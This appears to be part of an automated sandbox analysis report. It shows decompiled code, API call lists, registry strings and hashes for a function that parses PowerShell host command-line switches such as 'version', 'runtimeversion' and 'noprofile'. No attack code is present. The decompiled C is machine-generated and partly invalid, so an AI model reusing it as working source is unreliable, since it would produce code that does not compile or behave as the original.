                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258ac8
                                                                                                                                                                                                                              0x01258ad2
                                                                                                                                                                                                                              0x01258ad4
                                                                                                                                                                                                                              0x01258ad7
                                                                                                                                                                                                                              0x01258ada
                                                                                                                                                                                                                              0x0125af54
                                                                                                                                                                                                                              0x0125af57
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af5d
                                                                                                                                                                                                                              0x0125af73
                                                                                                                                                                                                                              0x0125af79
                                                                                                                                                                                                                              0x0125af7b
                                                                                                                                                                                                                              0x0125af7e
                                                                                                                                                                                                                              0x0125af81
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af81
                                                                                                                                                                                                                              0x01258ae0
                                                                                                                                                                                                                              0x01258aec
                                                                                                                                                                                                                              0x01258af1
                                                                                                                                                                                                                              0x01258af3
                                                                                                                                                                                                                              0x0125af88
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125af88
                                                                                                                                                                                                                              0x01258b05
                                                                                                                                                                                                                              0x01258b0a
                                                                                                                                                                                                                              0x01258b0d
                                                                                                                                                                                                                              0x01258b0f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258b15
                                                                                                                                                                                                                              0x01258b15
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258b15
                                                                                                                                                                                                                              0x01258b0f
                                                                                                                                                                                                                              0x01258a75
                                                                                                                                                                                                                              0x01258984
                                                                                                                                                                                                                              0x01258943
                                                                                                                                                                                                                              0x01258b78
                                                                                                                                                                                                                              0x01258b7b
                                                                                                                                                                                                                              0x0125ae00
                                                                                                                                                                                                                              0x0125ae00
                                                                                                                                                                                                                              0x01258b8a
                                                                                                                                                                                                                              0x01258b93
                                                                                                                                                                                                                              0x01258b99
                                                                                                                                                                                                                              0x01258b9c
                                                                                                                                                                                                                              0x01258b9f
                                                                                                                                                                                                                              0x01258ba2
                                                                                                                                                                                                                              0x01258ba6
                                                                                                                                                                                                                              0x01258bab
                                                                                                                                                                                                                              0x01258bad
                                                                                                                                                                                                                              0x0125ae51
                                                                                                                                                                                                                              0x0125ae51
                                                                                                                                                                                                                              0x0125ae56
                                                                                                                                                                                                                              0x01258c2d
                                                                                                                                                                                                                              0x01258c2d
                                                                                                                                                                                                                              0x01258c2f
                                                                                                                                                                                                                              0x01258c7f
                                                                                                                                                                                                                              0x01258c7f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258c7f
                                                                                                                                                                                                                              0x01258c49
                                                                                                                                                                                                                              0x01258c4e
                                                                                                                                                                                                                              0x01258c51
                                                                                                                                                                                                                              0x01258c53
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258c6c
                                                                                                                                                                                                                              0x01258c72
                                                                                                                                                                                                                              0x01258c74
                                                                                                                                                                                                                              0x01258c76
                                                                                                                                                                                                                              0x0125ae5e
                                                                                                                                                                                                                              0x0125ae61
                                                                                                                                                                                                                              0x0125ae64
                                                                                                                                                                                                                              0x0125aea1
                                                                                                                                                                                                                              0x0125aeb2
                                                                                                                                                                                                                              0x0125aeba
                                                                                                                                                                                                                              0x0125aebc
                                                                                                                                                                                                                              0x0125ae66
                                                                                                                                                                                                                              0x0125ae66
                                                                                                                                                                                                                              0x0125ae6b
                                                                                                                                                                                                                              0x0125ae6f
                                                                                                                                                                                                                              0x0125ae72
                                                                                                                                                                                                                              0x0125ae94
                                                                                                                                                                                                                              0x0125ae9a
                                                                                                                                                                                                                              0x0125ae9c
                                                                                                                                                                                                                              0x0125ae74
                                                                                                                                                                                                                              0x0125ae7c
                                                                                                                                                                                                                              0x0125ae82
                                                                                                                                                                                                                              0x0125ae84
                                                                                                                                                                                                                              0x0125ae84
                                                                                                                                                                                                                              0x0125ae72
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125ae64
                                                                                                                                                                                                                              0x01258c7c
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258c7c
                                                                                                                                                                                                                              0x01258bb5
                                                                                                                                                                                                                              0x01258bb9
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258bd7
                                                                                                                                                                                                                              0x01258bdc
                                                                                                                                                                                                                              0x01258bdf
                                                                                                                                                                                                                              0x01258be1
                                                                                                                                                                                                                              0x01258be4
                                                                                                                                                                                                                              0x0125ae0a
                                                                                                                                                                                                                              0x01258bea
                                                                                                                                                                                                                              0x01258bfb
                                                                                                                                                                                                                              0x01258c01
                                                                                                                                                                                                                              0x01258c03
                                                                                                                                                                                                                              0x0125ae20
                                                                                                                                                                                                                              0x0125ae2c
                                                                                                                                                                                                                              0x0125ae2f
                                                                                                                                                                                                                              0x0125ae3e
                                                                                                                                                                                                                              0x0125ae44
                                                                                                                                                                                                                              0x0125ae46
                                                                                                                                                                                                                              0x0125ae49
                                                                                                                                                                                                                              0x0125ae49
                                                                                                                                                                                                                              0x01258c09
                                                                                                                                                                                                                              0x01258c09
                                                                                                                                                                                                                              0x01258c0c
                                                                                                                                                                                                                              0x01258c0e
                                                                                                                                                                                                                              0x01258c11
                                                                                                                                                                                                                              0x01258c16
                                                                                                                                                                                                                              0x01258c16
                                                                                                                                                                                                                              0x01258c19
                                                                                                                                                                                                                              0x01258c1c
                                                                                                                                                                                                                              0x01258c1e
                                                                                                                                                                                                                              0x01258c21
                                                                                                                                                                                                                              0x01258c27
                                                                                                                                                                                                                              0x01258c27
                                                                                                                                                                                                                              0x01258c2a
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258c2a
                                                                                                                                                                                                                              0x01258b81
                                                                                                                                                                                                                              0x01258b84
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01258b84
                                                                                                                                                                                                                              0x012588cc
                                                                                                                                                                                                                              0x012588d1
                                                                                                                                                                                                                              0x012588d6
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012588d6

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 01258912
                                                                                                                                                                                                                              • wcstoul.MSVCRT ref: 01258975
                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 012589A6
                                                                                                                                                                                                                              • wcstoul.MSVCRT ref: 01258A08
                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 01258A41
                                                                                                                                                                                                                              • wcstoul.MSVCRT ref: 01258AA8
                                                                                                                                                                                                                              • free.MSVCRT(?,00000000,ConsoleHostAssemblyName,?,?,00000000,RuntimeVersion,?,?), ref: 01258B1D
                                                                                                                                                                                                                              • free.MSVCRT(00000000,00000000,ConsoleHostAssemblyName,?,?,00000000,RuntimeVersion,?,?), ref: 01258B2C
                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(00000000,00000000,ConsoleHostAssemblyName,?,?,00000000,RuntimeVersion,?,?), ref: 01258B42
                                                                                                                                                                                                                              • _itow_s.MSVCRT ref: 01258B93
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,?,?,?,?,?,?,00000000,00000000,00002014,00000001,?), ref: 01258BFB
                                                                                                                                                                                                                              • free.MSVCRT(?,?,?,?,?,?,00000000,00000000,00002014,00000001,?), ref: 01258C11
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00002014,00000001,?), ref: 01258C21
                                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,00000000), ref: 01258C6C
                                                                                                                                                                                                                                • Part of subcall function 01258D90: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\PowerShell,00000000,00020019,00000000,00000000,00000000), ref: 01258DF2
                                                                                                                                                                                                                                • Part of subcall function 01258D90: RegEnumKeyExW.KERNELBASE(00000000,00000000,00000000,00000100,00000000,00000000,00000000,?,00000000), ref: 01258E3A
                                                                                                                                                                                                                                • Part of subcall function 01258D90: wcschr.MSVCRT ref: 01258E8B
                                                                                                                                                                                                                                • Part of subcall function 01258D90: wcschr.MSVCRT ref: 01258E97
                                                                                                                                                                                                                                • Part of subcall function 01258C90: RegQueryValueExW.KERNELBASE(00000001,00002014,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 01258CEC
                                                                                                                                                                                                                                • Part of subcall function 01258C90: RegQueryValueExW.KERNELBASE(00000001,00002014,00000000,00000000,00000000,00000000), ref: 01258D43
                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,?,00000000,00000000), ref: 0125AFA9
                                                                                                                                                                                                                              • free.MSVCRT(00000000,00000000), ref: 0125AFEB
                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 0125AFF8
                                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 0125B025
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: freewcschr$Openwcstoul$CloseQueryValue$EnumFormatFreeLocalMessage_itow_s
                                                                                                                                                                                                                              • String ID: ConsoleHostAssemblyName$PowerShellVersion$RuntimeVersion$SOFTWARE\Microsoft\PowerShell\%1!ls!$SOFTWARE\Microsoft\PowerShell\%1!ls!\PowerShellEngine
                                                                                                                                                                                                                              • API String ID: 2663221310-3959523633
                                                                                                                                                                                                                              • Opcode ID: 21cb390e5d15d8099987179fa70117b54f92d643c0e4d08ef66ecc7742006f24
                                                                                                                                                                                                                              • Instruction ID: eb948b6574750bf19327ffc528f43676912c3a50c8f5a2e0f9eff33cf631a023
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21cb390e5d15d8099987179fa70117b54f92d643c0e4d08ef66ecc7742006f24
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9602F371E20219ABDF618F58DCCABBEBBB9AF44700F144129FE11A7294E771AC01D791
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 01259310, Relevance: 25.1, APIs: 7, Strings: 7, Instructions: 584COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 92%
                                                                                                                                                                                                                              			E01259310(intOrPtr __ecx, short* __edx, int* _a4, short* _a8, short* _a12, short* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr* _a28, void* _a32, signed int* _a36) {
				signed int _v8;
				signed short* _v12;
				signed int _v16;
				signed int _v20;
				char _v21;
				short* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				short _v48;
				short _v52;
				int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t184;
				short* _t188;
				signed short* _t189;
				signed short _t190;
				int _t193;
				signed short* _t194;
				int _t195;
				int _t197;
				intOrPtr* _t200;
				int _t204;
				void* _t212;
				signed int _t216;
				int _t217;
				signed int _t219;
				int _t220;
				signed short _t223;
				int _t227;
				signed short _t230;
				int _t232;
				int _t234;
				signed int _t235;
				signed short* _t240;
				signed int _t241;
				int _t242;
				signed int _t244;
				int _t245;
				signed int _t247;
				int _t248;
				short _t249;
				signed int _t257;
				int _t260;
				int _t262;
				int _t266;
				int _t268;
				int _t271;
				int _t273;
				int _t279;
				int _t288;
				int _t290;
				int _t296;
				int _t298;
				short* _t301;
				short* _t305;
				signed short _t309;
				signed short* _t312;
				int _t315;
				void* _t323;
				void** _t326;
				signed int _t339;
				signed short _t358;
				intOrPtr _t360;
				signed short* _t362;
				signed short* _t364;
				signed int _t365;
				signed int _t370;
				signed short* _t373;
				intOrPtr* _t374;
				signed int _t375;
				signed short* _t377;
				signed int _t382;
				void* _t388;
				int* _t390;
				signed int _t394;

				_t184 =  *0x1260358; // 0xc21f7063
				_v8 = _t184 ^ _t394;
				_t301 = __edx;
				_v21 = 0;
				_v28 = __edx;
				_v44 = __ecx;
				_v48 = 0xffffffff;
				_v52 = 0xffffffff;
				_v56 = 0;
				if(_a4 == 0 || _a8 == 0) {
					L124:
					_t357 = 0xfffd0000;
					goto L45;
				} else {
					_t305 = _a12;
					if(_t305 == 0) {
						goto L124;
					}
					_t188 = _a16;
					if(_t188 == 0 || _a20 == 0 || _a24 == 0 || _a28 == 0 || _a32 == 0 || _a36 == 0) {
						goto L124;
					} else {
						 *_t305 = 0xffffffff;
						 *_t188 = 0xffffffff;
						if(__ecx <= 1) {
							L46:
							_t357 = 0;
							L45:
							_pop(_t388);
							return E01259A40(_t357, _t301, _v8 ^ _t394, _t357, _t388, _t391);
						}
						_t189 =  *(__edx + 4);
						_v12 = _t189;
						_t391 = 0x2d;
						_v20 = 1;
						_v36 = 0x2013;
						_t190 =  *_t189 & 0x0000ffff;
						_t301 = 0x2015;
						_t358 = _t190;
						if(0x2013 == _t190 || 0x2014 == _t190 || 0x2015 == _t190 || 0x2d == _t190) {
							_v16 = _t190;
							_t193 = E01259200( &(_v12[1]));
							__eflags = _t193;
							if(_t193 == 0) {
								_t194 = _v12;
								_v32 = _t358;
								__eflags = 0 -  *((intOrPtr*)(_t194 + 2));
								_t309 = _t358;
								if(0 !=  *((intOrPtr*)(_t194 + 2))) {
									_v16 = 0;
									_t57 = _t194 + 2; // 0x2
									_t195 = E0125CE85(_t57, 8,  &_v16);
									_t312 = _v12;
									__eflags = _t195;
									if(_t195 >= 0) {
										_t313 =  &(_t312[1]);
										_t197 = CompareStringW(0x7f, 1, L"version", _v16,  &(_t312[1]), _v16); // executed
										__eflags = _t197;
										if(_t197 != 0) {
											__eflags = _t197 - 2;
											if(_t197 == 2) {
												__eflags = _v44 - 1 - 1;
												if(_v44 - 1 <= 1) {
													_push(L"version");
													goto L123;
												}
												_t204 = E0125BA32(_t313, 8, 0x2014,  *((intOrPtr*)(_v28 + 8)), _a8, _a12, 1, 1);
												__eflags = _t204;
												if(_t204 == 0) {
													goto L124;
												}
												_t360 = _v28;
												 *_a16 = 1;
												_t315 =  *(_t360 + 8);
												_v56 = _t315;
												 *_a4 = _t315;
												_v48 =  *_a8;
												_v52 =  *_a12;
												_t212 = _v44 - 1;
												__eflags = _t212 - 2;
												if(_t212 <= 2) {
													_t312 = _v12;
												} else {
													_t312 =  *(_t360 + 0xc);
													_v12 = _t312;
												}
												_t212 - 2 = 0;
												_v20 = (0 | _t212 - 0x00000002 > 0x00000000) + 2;
												L63:
												_t190 =  *_t312 & 0x0000ffff;
												goto L15;
											}
											_t312 = _v12;
											goto L63;
										}
										_t312 = _v12;
										goto L63;
									}
									_t190 = _v32 & 0x0000ffff;
									goto L15;
								}
								_t190 = _t309 & 0x0000ffff;
								_t312 = _v12;
								goto L15;
							}
							_t312 = _v12;
							_t190 = _v16 & 0x0000ffff;
							goto L15;
						} else {
							_t312 = _v12;
							L15:
							_t216 = _t190 & 0x0000ffff;
							if(0x2013 == _t216 || 0x2014 == _t216 || _t301 == _t216 || _t391 == _t216) {
								_t84 =  &(_t312[1]); // 0x2
								_t362 = _t84;
								_t217 = E01259200(_t362);
								__eflags = _t217;
								if(_t217 != 0) {
									goto L19;
								}
								__eflags = 0 -  *_t362;
								if(0 ==  *_t362) {
									goto L19;
								}
								_v16 = 0;
								_t296 = E0125CE85( &(_v12[1]), 0xb,  &_v16);
								__eflags = _t296;
								if(_t296 < 0) {
									goto L19;
								}
								_t298 = CompareStringW(0x7f, 1, L"servermode", _v16,  &(_v12[1]), _v16);
								__eflags = _t298;
								if(_t298 == 0) {
									goto L19;
								}
								__eflags = _t298 - 2;
								if(_t298 == 2) {
									goto L75;
								}
								goto L19;
							} else {
								L19:
								_t219 =  *_v12 & 0x0000ffff;
								if(0x2013 == _t219 || 0x2014 == _t219 || _t301 == _t219 || _t391 == _t219) {
									_t364 =  &(_v12[1]);
									_t220 = E01259200(_t364);
									__eflags = _t220;
									if(_t220 != 0) {
										goto L23;
									}
									__eflags = 0 -  *_t364;
									if(0 ==  *_t364) {
										goto L23;
									}
									_v16 = 0;
									_t288 = E0125CE85( &(_v12[1]), 2,  &_v16);
									__eflags = _t288;
									if(_t288 < 0) {
										goto L23;
									}
									_t290 = CompareStringW(0x7f, 1, "s", _v16,  &(_v12[1]), _v16);
									__eflags = _t290;
									if(_t290 == 0) {
										goto L23;
									}
									__eflags = _t290 - 2;
									if(_t290 != 2) {
										goto L23;
									}
									L75:
									_t326 = _a8;
									__eflags =  *_a16 - 0xffffffff;
									if( *_a16 == 0xffffffff) {
										_v20 = _v20 + 1;
										 *_t326 = 2;
										_v21 = 1;
										 *_a12 = 0xffffffff;
										 *_a4 = L"2.0";
									}
									goto L24;
								} else {
									L23:
									L24:
									_v40 = _v20;
									_t223 =  *_v12 & 0x0000ffff;
									_t365 = _t223;
									if(_v36 == _t223 || 0x2014 == _t223 || _t301 == _t223 || _t391 == _t223) {
										_v36 = _t365;
										_t227 = E01259200( &(_v12[1]));
										__eflags = _t227;
										if(_t227 == 0) {
											_t319 =  &(_v12[1]);
											_v16 = _t365;
											__eflags = 0 - _v12[1];
											_t230 = _t365;
											if(0 != _v12[1]) {
												_v32 = 0;
												_t232 = E0125CE85(_t319, 0xf,  &_v32);
												__eflags = _t232;
												if(_t232 >= 0) {
													_t234 = CompareStringW(0x7f, 1, L"runtimeversion", _v32,  &(_v12[1]), _v32);
													__eflags = _t234;
													if(_t234 != 0) {
														__eflags = _t234 - 2;
														if(_t234 == 2) {
															_t235 = _v20;
															_t323 = _v44 - 1;
															__eflags = _t235 - _t323;
															if(_t235 >= _t323) {
																_push(L"runtimeversion");
																goto L123;
															}
															_v20 = _t235 + 1;
															 *_a24 = _v40;
															 *_a20 =  *((intOrPtr*)(_v28 + _v20 * 4));
															_t370 = _v20;
															__eflags = _t370 - _t323;
															if(_t370 >= _t323) {
																_t240 = _v12;
															} else {
																_t382 = _t370 + 1;
																_v20 = _t382;
																_t240 =  *(_v28 + _t382 * 4);
																_v12 = _t240;
															}
															_t223 =  *_t240 & 0x0000ffff;
															L92:
															goto L28;
														}
														_t223 =  *_v12 & 0x0000ffff;
														goto L92;
													}
													_t223 =  *_v12 & 0x0000ffff;
													goto L92;
												}
												_t223 = _v16 & 0x0000ffff;
												goto L92;
											}
											_t223 = _t230 & 0x0000ffff;
											goto L92;
										}
										_t223 = _t365 & 0x0000ffff;
										goto L92;
									} else {
										L28:
										_v40 = _v20;
										_t241 = _t223 & 0x0000ffff;
										_t373 = _v12;
										if(0x2013 == _t241 || 0x2014 == _t241 || _t301 == _t241 || _t391 == _t241) {
											_t374 = _t373 + 2;
											_t242 = E01259200(_t374);
											__eflags = _t242;
											if(_t242 != 0) {
												L102:
												goto L32;
											}
											__eflags = 0 -  *_t374;
											if(0 ==  *_t374) {
												goto L102;
											}
											_v16 = 0;
											_t271 = E0125CE85( &(_v12[1]), 0xf,  &_v16);
											__eflags = _t271;
											if(_t271 < 0) {
												goto L102;
											}
											_t273 = CompareStringW(0x7f, 1, L"psconsolefile", _v16,  &(_v12[1]), _v16);
											__eflags = _t273;
											if(_t273 == 0) {
												goto L102;
											}
											__eflags = _t273 - 2;
											if(_t273 != 2) {
												goto L102;
											}
											_t339 = _v20;
											__eflags = _t339 - _v44 - 1;
											if(_t339 >= _v44 - 1) {
												_push(L"psconsolefile");
												L123:
												_t200 =  *0x12606dc; // 0x3403de0
												_t391 =  *( *_t200 + 4);
												 *0x1261204(_t200, 0, 1);
												 *( *( *_t200 + 4))();
												goto L124;
											}
											_v20 = _t339 + 1;
											__eflags = E0125C11A( *((intOrPtr*)(_v28 + (_t339 + 1) * 4)), 0xf);
											if(__eflags == 0) {
												L103:
												_t357 = 0xfffc0000;
												goto L45;
											}
											_push(_a12);
											_push(_a8);
											_t279 = E0125CA89(_t301,  *((intOrPtr*)(_v28 + _v20 * 4)), _a4, 0x2014, _t391, __eflags);
											__eflags = _t279;
											if(_t279 == 0) {
												goto L103;
											}
											 *_a32 = _v40;
											 *_a28 =  *((intOrPtr*)(_v28 + _v20 * 4));
											goto L102;
										} else {
											L32:
											_t375 = 0x2013;
											_t244 =  *_v12 & 0x0000ffff;
											if(0x2013 == _t244 || 0x2014 == _t244 || _t301 == _t244 || _t391 == _t244) {
												_t377 =  &(_v12[1]);
												_t245 = E01259200(_t377);
												__eflags = _t245;
												if(_t245 != 0) {
													L110:
													_t326 = _a8;
													_t375 = 0x2013;
													goto L36;
												}
												__eflags = 0 -  *_t377;
												if(0 ==  *_t377) {
													goto L110;
												}
												_v16 = 0;
												_t266 = E0125CE85( &(_v12[1]), 0xa,  &_v16);
												__eflags = _t266;
												if(_t266 < 0) {
													goto L110;
												}
												_t268 = CompareStringW(0x7f, 1, L"noprofile", _v16,  &(_v12[1]), _v16);
												__eflags = _t268;
												if(_t268 == 0) {
													goto L110;
												}
												__eflags = _t268 - 2;
												if(_t268 == 2) {
													goto L116;
												}
												goto L110;
											} else {
												L36:
												_t247 =  *_v12 & 0x0000ffff;
												if(_t375 == _t247 || 0x2014 == _t247 || _t301 == _t247 || _t391 == _t247) {
													_t391 =  &(_v12[1]);
													_t248 = E01259200(_t391);
													__eflags = _t248;
													if(_t248 != 0) {
														L117:
														_t326 = _a8;
														goto L40;
													}
													__eflags = 0 -  *_t391;
													if(0 ==  *_t391) {
														goto L117;
													}
													_v16 = 0;
													_t260 = E0125CE85(_t391, 4,  &_v16);
													__eflags = _t260;
													if(_t260 < 0) {
														goto L117;
													}
													_t262 = CompareStringW(0x7f, 1, L"nop", _v16, _t391, _v16);
													__eflags = _t262;
													if(_t262 == 0) {
														goto L117;
													}
													__eflags = _t262 - 2;
													if(_t262 != 2) {
														goto L117;
													}
													L116:
													 *_a36 = _v20;
													goto L117;
												} else {
													L40:
													_t301 = _a16;
													_t249 =  *_t301;
													if(_t249 != 0xffffffff) {
														_t391 = _a12;
														_t357 = 0;
														_t390 = _a4;
														L44:
														if(_t249 != 0xffffffff) {
															__eflags =  *_a32 - 0xffffffff;
															if( *_a32 != 0xffffffff) {
																 *_a8 = _v48;
																 *_t391 = _v52;
																 *_t390 = _v56;
															}
														}
														goto L45;
													}
													if(_v21 != 0) {
														goto L46;
													}
													_t391 = _a12;
													 *_t326 = 3;
													_v40 = 0;
													_v36 = 0;
													 *_t391 = _t249;
													_v16 = 0;
													_t257 = E01258850( &_v16, _t326, 0xffffffff,  &_v36, _t326,  &_v40); // executed
													_t357 = _t257;
													if(_t257 != 0) {
														goto L45;
													} else {
														_t390 = _a4;
														_t249 =  *_t301;
														 *_t390 = _v16;
														goto L44;
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}



















































































                                                                                                                                                                                                                              0x01259318
                                                                                                                                                                                                                              0x0125931f
                                                                                                                                                                                                                              0x01259327
                                                                                                                                                                                                                              0x01259329
                                                                                                                                                                                                                              0x01259330
                                                                                                                                                                                                                              0x01259334
                                                                                                                                                                                                                              0x01259337
                                                                                                                                                                                                                              0x0125933e
                                                                                                                                                                                                                              0x01259345
                                                                                                                                                                                                                              0x0125934c
                                                                                                                                                                                                                              0x0125b92d
                                                                                                                                                                                                                              0x0125b92d
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125935c
                                                                                                                                                                                                                              0x0125935c
                                                                                                                                                                                                                              0x01259361
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259367
                                                                                                                                                                                                                              0x0125936c
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012593a4
                                                                                                                                                                                                                              0x012593a4
                                                                                                                                                                                                                              0x012593aa
                                                                                                                                                                                                                              0x012593b3
                                                                                                                                                                                                                              0x0125959b
                                                                                                                                                                                                                              0x0125959b
                                                                                                                                                                                                                              0x01259586
                                                                                                                                                                                                                              0x0125958b
                                                                                                                                                                                                                              0x01259598
                                                                                                                                                                                                                              0x01259598
                                                                                                                                                                                                                              0x012593b9
                                                                                                                                                                                                                              0x012593c1
                                                                                                                                                                                                                              0x012593c4
                                                                                                                                                                                                                              0x012593c9
                                                                                                                                                                                                                              0x012593d0
                                                                                                                                                                                                                              0x012593d3
                                                                                                                                                                                                                              0x012593d9
                                                                                                                                                                                                                              0x012593dc
                                                                                                                                                                                                                              0x012593e1
                                                                                                                                                                                                                              0x0125b45a
                                                                                                                                                                                                                              0x0125b464
                                                                                                                                                                                                                              0x0125b469
                                                                                                                                                                                                                              0x0125b46b
                                                                                                                                                                                                                              0x0125b47b
                                                                                                                                                                                                                              0x0125b480
                                                                                                                                                                                                                              0x0125b485
                                                                                                                                                                                                                              0x0125b489
                                                                                                                                                                                                                              0x0125b48b
                                                                                                                                                                                                                              0x0125b49b
                                                                                                                                                                                                                              0x0125b4a8
                                                                                                                                                                                                                              0x0125b4ab
                                                                                                                                                                                                                              0x0125b4b0
                                                                                                                                                                                                                              0x0125b4b3
                                                                                                                                                                                                                              0x0125b4b5
                                                                                                                                                                                                                              0x0125b4c5
                                                                                                                                                                                                                              0x0125b4d4
                                                                                                                                                                                                                              0x0125b4da
                                                                                                                                                                                                                              0x0125b4dc
                                                                                                                                                                                                                              0x0125b4e6
                                                                                                                                                                                                                              0x0125b4e9
                                                                                                                                                                                                                              0x0125b4f4
                                                                                                                                                                                                                              0x0125b4f7
                                                                                                                                                                                                                              0x0125b90c
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b90c
                                                                                                                                                                                                                              0x0125b50d
                                                                                                                                                                                                                              0x0125b512
                                                                                                                                                                                                                              0x0125b514
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b51d
                                                                                                                                                                                                                              0x0125b520
                                                                                                                                                                                                                              0x0125b529
                                                                                                                                                                                                                              0x0125b52c
                                                                                                                                                                                                                              0x0125b52f
                                                                                                                                                                                                                              0x0125b536
                                                                                                                                                                                                                              0x0125b53e
                                                                                                                                                                                                                              0x0125b544
                                                                                                                                                                                                                              0x0125b545
                                                                                                                                                                                                                              0x0125b548
                                                                                                                                                                                                                              0x0125b552
                                                                                                                                                                                                                              0x0125b54a
                                                                                                                                                                                                                              0x0125b54a
                                                                                                                                                                                                                              0x0125b54d
                                                                                                                                                                                                                              0x0125b54d
                                                                                                                                                                                                                              0x0125b560
                                                                                                                                                                                                                              0x0125b563
                                                                                                                                                                                                                              0x0125b566
                                                                                                                                                                                                                              0x0125b566
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b566
                                                                                                                                                                                                                              0x0125b4eb
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b4eb
                                                                                                                                                                                                                              0x0125b4de
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b4de
                                                                                                                                                                                                                              0x0125b4ba
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b4ba
                                                                                                                                                                                                                              0x0125b48d
                                                                                                                                                                                                                              0x0125b490
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b490
                                                                                                                                                                                                                              0x0125b470
                                                                                                                                                                                                                              0x0125b473
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259402
                                                                                                                                                                                                                              0x01259402
                                                                                                                                                                                                                              0x01259405
                                                                                                                                                                                                                              0x01259405
                                                                                                                                                                                                                              0x01259410
                                                                                                                                                                                                                              0x0125b56e
                                                                                                                                                                                                                              0x0125b56e
                                                                                                                                                                                                                              0x0125b572
                                                                                                                                                                                                                              0x0125b577
                                                                                                                                                                                                                              0x0125b579
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b581
                                                                                                                                                                                                                              0x0125b584
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b592
                                                                                                                                                                                                                              0x0125b59c
                                                                                                                                                                                                                              0x0125b5a1
                                                                                                                                                                                                                              0x0125b5a3
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b5be
                                                                                                                                                                                                                              0x0125b5c4
                                                                                                                                                                                                                              0x0125b5c6
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125b5cc
                                                                                                                                                                                                                              0x0125b5cf
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x01259431
                                                                                                                                                                                                                              0x01259431
                                                                                                                                                                                                                              0x01259439
                                                                                                                                                                                                                              0x0125943f
                                                                                                                                                                                                                              0x0125b5d9
                                                                                                                                                                                                                              0x0125b5dd
                                                                                                                                                                                                                              0x0125b5e2
                                                                                                                                                                                                                              0x0125b5e4
